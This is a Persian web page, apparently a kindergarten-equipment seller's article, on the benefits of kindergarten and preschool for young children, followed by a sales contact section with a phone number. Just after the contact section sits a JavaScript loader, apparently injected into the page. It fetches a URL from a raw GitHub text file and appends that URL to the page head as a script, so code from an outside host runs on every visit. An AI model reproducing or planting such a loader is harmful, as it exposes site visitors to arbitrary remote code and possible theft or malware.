فواید مهدکودک برای کودکان

  • مهدکودک یا پیش‌دبستانی خوب محیطی امن، شاداب و خلاق است که اولین تجربیات کودک در تعامل با اجتماع در آنجا شکل می‌گیرد. این تجربیات اگر غنی و به‌موقع باشند، موجب رشد مهارت‌های مهمی می‌شوند که کودک باید در طول زندگی کسب کند

    تفاوت مهد‌کودک، پیش‌دبستانی و مراقبت انفرادی

    مهدکودک‌ها اغلب برنامه‌ای منعطف‌تر از پیش‌دبستانی‌ها دارند که برای کودکان کم‌سن‌تر نیز مناسب‌اند. مهدکودک محلی سرگرم‌کننده است که فلسفهٔ وجودی‌اش فراهم‌کردن امکان بازی، شادی و خواب کودک است. اما پیش‌دبستانی‌ها با هدف آموزش‌های ابتدایی، که روی مراحل اصلی رشد کودک متمرکز است، خلاقیت و بازی‌های همیارانه و… را تشویق می‌کنند.

    مهدکودک

    هدف بیشتر پیش‌دبستانی‌ها آماده‌کردن کودکان برای سال‌های مدرسه است. آنها این هدف را با آموزش مهارت‌های اجتماعی و تحصیلی دنبال می‌کنند. برخلاف مهدکودک، در پیش‌دبستانی، تمرکز روی آموزش‌های ابتدایی و تحصیلی است. این آموزش‌ها کودکان را برای آموزش‌‌های رسمی مدرسه آماده می‌کند و آنها را در چند سال‌ آغاز مدرسه جلو می‌اندازد. پیش‌دبستانی‌ها برنامه‌هایی ساختارمندتر و آموزشی رسمی‌تر دارند و در کنار آن تا‌اندازه‌ای تعاملات اجتماعی را فراهم می‌کنند.

    در پیش‌دبستانی‌های معتبر معمولا مربیانی با تحصیلات مرتبط به حوزه آموزش ابتدایی حضور دارند که مهدکودک‌ها معمولا فاقد این سطح از تخصص هستند.

    مهدکودک‌ها ممکن است برنامه‌های خاصی برای نگهداری کودکان خارج از ساعت اصلی داشته باشند و در تابستان فعال هستند؛ البته ممکن است برخی از پیش‌دبستانی‌ها نیز این خدمات را ارائه بدهند.

    در ایران، مهدکودک‌ها کودکان کم‌سن‌وسال‌تر را پذیرش می‌کنند و پیش‌دبستانی‌ها برای کودکان بین ۵ یا ۶ساله هستند؛ البته، گاهی کودکان کم‌سن‌وسال‌تری که نشانه‌هایی از علاقه به یادگیری و ارتباط با دیگران را نشان می‌دهند هم برای حضور در پیش‌دبستانی آمادگی دارند. هرچند برای این کودکان در ایران، امکان حضور در پیش‌دبستانی فراهم نیست، می‌توان برای آنها به‌دنبال مهدکودک‌هایی بود که بیشتر با اهداف پیش‌دبستانی هم‌سو هستند. در برخی کشورها، مانند کانادا، کودکان ۲٫۵ تا ۵ ساله می‌توانند در پیش‌دبستانی‌ها ثبت‌نام کنند. پیش‌دبستانی برای کودکانی که هنوز به مقدار زیادی توجه انفرادی نیاز دارند یا برای آن دسته از کودکان که نیازهای خاص یا اضطراب جدایی شدید دارند، مناسب نیست.

    در مراقبت‌های تک‌به‌تک، مانند آنچه پرستار بچه فراهم می‌کند، توجه شخصیِ بیشتری معطوف به کودک است و مانند پیش‌دبستانی و مهدکودک، مسئلۀ نسبت تعداد کودک به مربی مطرح نیست.

    در نهایت، مهدکودک یا پیش‌دبستانی‌ ممکن است برای همهٔ کودکان انتخاب مناسبی نباشد اما برای بسیاری انتخابی عالی است. به یاد داشته باشید که شرکت‌نکردن در کلاس‌های پیش‌دبستانی می‌تواند فرزند شما را در سال‌های اولیه تحصیل با افت یادگیری مواجه کند و ظرفیت‌های بالقوهٔ او را خاموش نگه دارد، در ارتباطات اجتماعی او اخلال ایجاد کند و بر اضطراب او برای ورود به مدرسه دامن بزند؛ برای همین، متخصصان آموزش‌وپرورش کشور تأکید می‌کنند که همهٔ کودکان، پیش از ورود به کلاس اول، آموزش‌های پیش‌دبستانی را گذرانده باشند.

    فواید مهد کودک

    مهدکودک

    در سنین مهدکودک، مغز به‌سرعت در حال توسعه است و به‌اصطلاح، در دورهٔ حساس قرار دارد؛ بنابراین، تجربیات غنی اولیه، مانند آنچه در مهدکودک خوب فراهم می‌شوند، مراحل رشدی کودک را تسهیل می‌کنند. رشد اجتماعی و عاطفی ازجمله فواید مهد کودک برای کودکان است. در مهدکودک، توانایی تفکر، درک و استفاده از زبان و مهارت‌های حرکتی ظریف کودکان ازطریق بازی، کارهای هنری، رقص، موسیقی، تحرک و ارتباط با دیگران تقویت می‌شود.

    کودک در مهد می‌آموزد که یادگیرنده‌ای حرفه‌ای باشد؛ این مهم‌ترین فایده مهد کودک است. یادگیری اثربخش با پرورش و تقویت مهارت‌های ارتباطی، تقویت اعتماد‌به‌نفس، آموختن خلاقیت و پرورش مهارت‌های پیش‌نیاز برای خواندن، نوشتن و ریاضیات میسر می‌شود.

    در مهدکودک خوب، برنامه‌هایی طراحی و اجرا می‌شود که تمرکز آن بر پرورش کودک در حیطه‌های اساسی زیر است:

    • مهارت‌های اجتماعی مانند بازی‌کردن با شیوه‌ای آرام و اقناع‌کننده در عین سهیم‌کردن دیگران در وسایل؛
    • خودآگاهی و احترام به دیگران؛
    • مهارت‌های عاطفی مانند درک احساسات خود؛
    • آموختن اعداد و شمارش اشیا و شناخت اشکال هندسی؛
    • لذت یادگیری و فعالیت گروهی، برای نمونه گفت‌وگو با دیگران، ساختن چیزها با همکاری هم‌سن‌وسال‌ها؛
    • توانایی پیدا‌کردن دوست تازه؛
    • مواجهه با نظرات و مفاهیم تازه؛
    • شکل‌گیری اعتماد‌به‌نفس و عزت نفس کودک با تقویت مهارت‌های زبانی، ازطریق بحث‌های گروهی و تعاملات روزمره با مربیان و دیگر کودکان؛
    • اصلاح تلفظ کلمات و گسترش دامنه واژگان.

    فواید مهد کودک برای کودکان دارای نیازهای خاص

    برای خانواده‌هایی که کودکی با نیازهای خاص دارند، مهدکودک می‌تواند محل دریافت حمایت‌ها و کمک‌های ویژه باشد و منابع و ارتباطاتی برای دریافت خدمات حمایت اجتماعی فراهم کند؛ همچنین این خانواده‌ها می‌توانند تجربیات مفید خود را در اختیار یکدیگر قرار بدهند و گرد هم بیایند.

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید انواع تجهیزات مهد کودک می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید